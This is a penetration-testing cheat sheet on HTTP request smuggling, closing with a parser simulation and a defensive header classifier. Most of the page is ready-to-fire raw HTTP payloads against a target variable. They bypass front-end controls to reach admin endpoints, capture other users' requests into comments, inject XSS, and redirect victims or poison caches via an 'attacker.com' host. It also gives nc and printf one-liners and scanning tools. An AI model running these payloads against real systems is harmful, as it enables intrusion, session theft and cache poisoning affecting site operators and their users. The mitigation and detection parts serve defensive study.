
# HTTP Request Smuggling

## Overview

### What is HTTP Request Smuggling?

HTTP Request Smuggling exploits discrepancies in how front-end and back-end servers decide where one HTTP request ends and the next begins, specifically in how they interpret the `Content-Length` and `Transfer-Encoding` headers.

Attack types:

| Type  | Front-End Uses    | Back-End Uses     | Result |
|-------|-------------------|-------------------|--------|
| CL.TE | Content-Length    | Transfer-Encoding | Front-end sees one request, back-end sees two |
| TE.CL | Transfer-Encoding | Content-Length    | Front-end reads the chunked body as one request, back-end stops at Content-Length and treats the remaining bytes as a second request |
| TE.TE | Transfer-Encoding | Transfer-Encoding | An obfuscated TE header is honoured by one server and ignored by the other, so the pair degrades to a CL.TE or TE.CL parsing difference |

### Prerequisites

- Target has a front-end proxy/load balancer
- Back-end server processes HTTP differently than the front-end
- Both servers support keep-alive connections

## Detection

### Quick Check (One-liner)

```bash
# Quick HTTP smuggling detection: run smuggler, then send one ambiguous request.
# $'...' is needed so \r\n become real CR LF bytes; inside "..." they stay literal backslashes.
# Note: curl switches to chunked upload itself when it sees Transfer-Encoding: chunked, so this
# is only a rough probe; use the printf | nc form further down for exact byte control.
python3 smuggler.py -u https://$rhost -q && timeout 5 curl -X POST https://$rhost -H "Transfer-Encoding: chunked" --data-binary $'0\r\n\r\n'
```

### Timing-Based Detection

CL.TE detection: if vulnerable, the request times out. The front-end forwards only the 4 bytes `1\r\nA`; the back-end reads them as a 1-byte chunk and then waits for the next chunk-size line that never arrives.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

1
A
X
```

TE.CL detection: if vulnerable, the request times out. The front-end stops at the terminating `0` chunk and forwards 5 bytes; the back-end expects 6 and waits for the last one.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

X
```

### Differential Response Detection

Send a normal request, then the smuggling request, and compare the two responses. If they differ, the target is likely vulnerable.


## CL.TE Smuggling

### Concept

- Front-end: uses `Content-Length`
- Back-end: uses `Transfer-Encoding: chunked`

### Basic CL.TE Attack

Smuggles a request prefix that poisons the next user's request: the front-end forwards all 13 bytes, the back-end stops after the `0` chunk and leaves `SMUGGLED` queued as the start of the next request on the connection.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
```

### CL.TE with Request Hijacking

Captures the next user's request by smuggling an incomplete request: the smuggled `GET` ends with the `Foo: x` header and no blank line, so the start of the next user's request is appended to that header.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: $rhost
Foo: x
```

### CL.TE to Access Admin

Smuggles a request to the admin endpoint; the `Host: localhost` header makes it look like an internal request to the back-end.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
```

## TE.CL Smuggling

### Concept

- Front-end: uses `Transfer-Encoding: chunked`
- Back-end: uses `Content-Length`

### Basic TE.CL Attack

The back-end processes the request based on `Content-Length` (4 bytes, i.e. `5c\r\n`) and ignores the chunked encoding, so the `GPOST` chunk data is parsed as the beginning of the next request.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```
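To see why the timing probes in the Detection section hang and how the basic CL.TE and TE.CL payloads split one request into two, here is an added example that is not part of the original cheat sheet: two toy body framers, one that trusts `Content-Length` and one that trusts `Transfer-Encoding: chunked`, run over the page's own payloads. The host `target.example` is a constructed placeholder, and the framers are deliberately minimal (no trailers, chunk extensions ignored); they model the behaviour the text describes, not any real server's code.

```python
"""Added example (not from the original cheat sheet): a model of the
CL.TE / TE.CL desync using two toy framers. target.example is a
constructed placeholder host."""
from typing import Callable, Dict, Tuple


def parse_head(raw: bytes) -> Tuple[bytes, Dict[str, str], bytes]:
    """Split a raw request into (request line, lower-cased headers, body bytes)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip().decode()
    return lines[0], headers, rest


def frame_by_content_length(raw: bytes) -> Tuple[bytes, bytes]:
    """Server that honours Content-Length. Returns (body, bytes left on the socket).
    Raises EOFError when fewer bytes than Content-Length are present: a real server
    keeps waiting, which is the timeout the TE.CL timing probe relies on."""
    _, headers, rest = parse_head(raw)
    n = int(headers.get("content-length", "0"))
    if len(rest) < n:
        raise EOFError("short read: server would wait for more bytes")
    return rest[:n], rest[n:]


def frame_by_chunked(raw: bytes) -> Tuple[bytes, bytes]:
    """Server that honours Transfer-Encoding: chunked. Returns (body, leftover).
    Raises EOFError on a truncated chunked body (the CL.TE timing probe)."""
    _, headers, rest = parse_head(raw)
    if "chunked" not in headers.get("transfer-encoding", "").lower():
        raise ValueError("request is not chunked")
    body, pos = b"", 0
    while True:
        end = rest.find(b"\r\n", pos)
        if end < 0:
            raise EOFError("incomplete chunk-size line: server would wait")
        size = int(rest[pos:end].split(b";")[0], 16)  # chunk extensions ignored
        pos = end + 2
        if size == 0:
            # last chunk; no trailers assumed, so one CRLF ends the body
            if rest[pos:pos + 2] != b"\r\n":
                raise EOFError("incomplete terminator: server would wait")
            return body, rest[pos + 2:]
        if len(rest) < pos + size + 2:
            raise EOFError("incomplete chunk data: server would wait")
        if rest[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("chunk data not followed by CRLF")
        body += rest[pos:pos + size]
        pos += size + 2


def simulate_cl_te(raw: bytes) -> Tuple[bytes, bytes]:
    """CL.TE: front-end frames by Content-Length and forwards exactly that much;
    back-end re-frames the forwarded bytes as chunked. Returns (back-end body,
    bytes the back-end leaves queued for the next request on the connection)."""
    head = raw.partition(b"\r\n\r\n")[0]
    fe_body, _ = frame_by_content_length(raw)
    return frame_by_chunked(head + b"\r\n\r\n" + fe_body)


def simulate_te_cl(raw: bytes) -> Tuple[bytes, bytes]:
    """TE.CL: front-end frames by chunked and forwards the bytes it consumed
    verbatim; back-end frames those same bytes by Content-Length."""
    _, leftover = frame_by_chunked(raw)
    forwarded = raw[:len(raw) - len(leftover)]
    return frame_by_content_length(forwarded)


def would_block(simulate: Callable[[bytes], Tuple[bytes, bytes]], raw: bytes) -> bool:
    """True when the second server is left waiting for bytes that never come."""
    try:
        simulate(raw)
    except EOFError:
        return True
    return False


HEAD = (b"POST / HTTP/1.1\r\nHost: target.example\r\n"
        b"Content-Type: application/x-www-form-urlencoded\r\n")
# Payloads copied from the page, with the placeholder host substituted.
CLTE_PROBE = HEAD + b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n1\r\nA\r\nX"
TECL_PROBE = HEAD + b"Content-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nX"
CLTE_ATTACK = HEAD + b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED"
TECL_ATTACK = (HEAD + b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\n\r\n"
               b"5c\r\nGPOST / HTTP/1.1\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: 15\r\n\r\nx=1\r\n0\r\n\r\n")

if __name__ == "__main__":
    print("CL.TE probe leaves back-end waiting:", would_block(simulate_cl_te, CLTE_PROBE))
    print("TE.CL probe leaves back-end waiting:", would_block(simulate_te_cl, TECL_PROBE))
    print("CL.TE payload queued at back-end:", simulate_cl_te(CLTE_ATTACK)[1])
    print("TE.CL payload queued at back-end:", simulate_te_cl(TECL_ATTACK)[1][:16])
```

Running it shows both probes end in `EOFError` (the real-world timeout), the CL.TE payload leaves `b"SMUGGLED"` queued on the back-end connection, and the TE.CL payload leaves bytes starting with `GPOST / HTTP/1.1`, which is exactly the prefix that lands on the next request. The chunk size `5c` checks out: the chunk data from `GPOST` up to and including `x=1` is 92 bytes.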

### TE.CL Request Hijacking

Poisons the next request with a smuggled prefix.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

87
GET /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```


## TE.TE Smuggling

### Concept

Both servers support `Transfer-Encoding`, but one of them can be tricked into not processing it with an obfuscated header, at which point it falls back to `Content-Length`.

### Header Obfuscation Techniques

Different ways to obfuscate `Transfer-Encoding` (`[tab]`, `[space]` and `[\n]` stand for the literal characters):

```http
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
[space]Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
 : chunked
```

### TE.TE Attack Example

One server processes the obfuscated TE header and the other ignores it; here the duplicated `Transfer-encoding: x` is the obfuscation.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-encoding: x

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0
```


## Exploitation Techniques

### Bypass Front-End Security Controls

Accesses restricted endpoints by smuggling a request with an internal `Host` header, which the front-end never gets to inspect.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
X-Original-URL: /admin
Content-Length: 10

x=1
```

### Capture Other Users' Requests

Smuggles a POST whose `Content-Length` (400) is larger than its own body, so the back-end appends the next user's request to the `comment=` parameter and stores it.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 400
Cookie: session=attacker_session

comment=
```

Result: the next user's full request is captured in the comment field.

### Reflected XSS via Smuggling

Smuggles an XSS payload that is reflected in the victim's response.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /search?q=<script>alert(1)</script> HTTP/1.1
Host: $rhost
X-Ignore: x
```

### Open Redirect to Credential Theft

Redirects the victim to an attacker-controlled server via the smuggled `Host` header.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 150
Transfer-Encoding: chunked

0

GET /login HTTP/1.1
Host: attacker.com
X-Ignore: x
```

### Web Cache Poisoning via Smuggling

Poisons the cache with a malicious response for a static resource.

```http
POST / HTTP/1.1
Host: $rhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 200
Transfer-Encoding: chunked

0

GET /static/app.js HTTP/1.1
Host: $rhost
X-Forwarded-Host: attacker.com
X-Ignore: x
```

## Tools

### Burp Suite Extensions

Use Burp's HTTP Request Smuggler extension:

1. Install "HTTP Request Smuggler" from the BApp Store
2. Right-click request → Extensions → HTTP Request Smuggler → Smuggle probe
3. Review results in Logger

### smuggler.py

Automated detection tool:

```bash
git clone https://github.com/defparam/smuggler.git
cd smuggler

# Scan single URL
python3 smuggler.py -u https://$rhost/

# Scan with custom config
python3 smuggler.py -u https://$rhost/ -c payloads/default.py
```

### h2csmuggler (HTTP/2 Downgrade)

Smuggle via an HTTP/2 to HTTP/1.1 downgrade:

```bash
git clone https://github.com/BishopFox/h2csmuggler.git
cd h2csmuggler

# Test for vulnerability
python3 h2csmuggler.py -x https://$rhost/ --test

# Smuggle request
python3 h2csmuggler.py -x https://$rhost/ -X GET /admin
```

### Manual Testing with curl

Send a raw smuggling payload:

```bash
# Note: curl may normalize headers, use netcat for precision.
# payload.txt must use CRLF line endings, otherwise the request is not well-formed HTTP.
cat payload.txt | nc $rhost 80
```

Using printf for exact byte control (printf interprets \r\n itself, so the backslashes may stay inside double quotes and $rhost still expands):

```bash
# Content-Length 13 covers the whole body "0\r\n\r\nSMUGGLED" (5 + 8 bytes), matching the basic CL.TE payload above.
printf "POST / HTTP/1.1\r\nHost: $rhost\r\nContent-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED" | nc $rhost 80
```

## Mitigation & Detection

### Prevention (Blue Team)

- Use HTTP/2 end-to-end (not downgraded)
- Normalize incoming requests at the front-end
- Reject ambiguous requests (both CL and TE headers)
- Configure the back-end to reject requests with `Transfer-Encoding`

### Detection

- Monitor for requests containing both `Content-Length` and `Transfer-Encoding`
- Alert on chunked encoding with small `Content-Length` values
- Look for unusual timing patterns in request processing
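The "reject ambiguous requests" and "monitor for CL + TE" items above, plus the header obfuscations listed in the TE.TE section, as an added example that is not part of the original cheat sheet: a strict header check a front-end or a log-review script can apply. It returns the reasons a request should be rejected (or alerted on) rather than forwarded. The sample requests are constructed, `target.example` is a placeholder host, and the rules follow RFC 7230 (CRLF line endings only, token header names, no obsolete line folding, Transfer-Encoding overriding and conflicting with Content-Length); nothing here is the code of any real proxy.

```python
"""Added example (not from the original cheat sheet): strict checks for
ambiguous or obfuscated request framing headers. Sample requests are
constructed; target.example is a placeholder host."""
import re
from typing import Dict, List, Tuple

TCHAR = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")   # RFC 7230 token characters
KNOWN_CODINGS = {b"chunked", b"gzip", b"deflate", b"compress", b"identity"}


def strict_headers(head: bytes) -> Tuple[List[Tuple[bytes, bytes]], List[str]]:
    """Parse a request head strictly. Returns (lower-cased headers, findings)."""
    findings: List[str] = []
    if b"\n" in head.replace(b"\r\n", b""):
        findings.append("bare-LF-line-ending")          # "X: X[\n]Transfer-Encoding: chunked"
    headers: List[Tuple[bytes, bytes]] = []
    for line in head.split(b"\r\n")[1:]:
        if not line:
            continue
        if line[:1] in (b" ", b"\t"):
            findings.append("obsolete-line-folding")    # "[space]Transfer-Encoding" / "\r\n : chunked"
            continue
        name, sep, value = line.partition(b":")
        if not sep or not TCHAR.match(name):
            findings.append("malformed-header-name")    # "Transfer-Encoding : chunked"
            continue
        headers.append((name.lower(), value.strip(b" \t")))  # OWS incl. [tab] stripped
    return headers, findings


def classify_request(raw: bytes) -> List[str]:
    """Reasons a strict front-end should reject `raw`; an empty list means unambiguous."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers, findings = strict_headers(head)
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [v for n, v in headers if n == b"content-length"]
    if te and cl:
        findings.append("both-content-length-and-transfer-encoding")
    if len(te) > 1:
        findings.append("multiple-transfer-encoding-headers")
    if len(set(cl)) > 1:
        findings.append("conflicting-content-length-values")
    for v in te:
        codings = [c.strip(b" \t").lower() for c in v.split(b",")]
        if any(c not in KNOWN_CODINGS for c in codings):
            findings.append("unknown-transfer-coding")   # "xchunked", "x"
        elif codings[-1] != b"chunked":
            findings.append("chunked-not-final-coding")
    if any(not v.isdigit() for v in cl):
        findings.append("non-numeric-content-length")
    return findings


def audit(samples: Dict[str, bytes]) -> Dict[str, List[str]]:
    """Run the classifier over a batch, e.g. requests replayed from a capture."""
    return {name: classify_request(raw) for name, raw in samples.items()}


_HEAD = b"POST / HTTP/1.1\r\nHost: target.example\r\n"
# Constructed sample requests: two clean ones and the page's obfuscation variants.
SAMPLES: Dict[str, bytes] = {
    "plain-cl":    _HEAD + b"Content-Length: 3\r\n\r\nx=1",
    "plain-te":    _HEAD + b"Transfer-Encoding: chunked\r\n\r\n3\r\nx=1\r\n0\r\n\r\n",
    "cl-and-te":   _HEAD + b"Content-Length: 13\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED",
    "te-te-dup":   _HEAD + b"Content-Length: 4\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: x\r\n\r\n",
    "space-colon": _HEAD + b"Transfer-Encoding : chunked\r\n\r\n",
    "xchunked":    _HEAD + b"Transfer-Encoding: xchunked\r\n\r\n",
    "bare-lf":     _HEAD + b"X: X\nTransfer-Encoding: chunked\r\n\r\n",
    "obs-fold":    _HEAD + b"Transfer-Encoding\r\n : chunked\r\n\r\n",
}

if __name__ == "__main__":
    for name, reasons in audit(SAMPLES).items():
        verdict = "ACCEPT" if not reasons else "REJECT " + ", ".join(reasons)
        print(f"{name:12} {verdict}")
```

One caveat worth knowing: `Transfer-Encoding:[tab]chunked` is legal per RFC 7230 (tab is optional whitespace), so the parser normalizes it to plain `chunked`; it is only flagged when a `Content-Length` is also present, which is the case in every TE.TE payload on this page. Conversely, a request that carries only `Transfer-Encoding: chunked` is accepted, since it is unambiguous.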
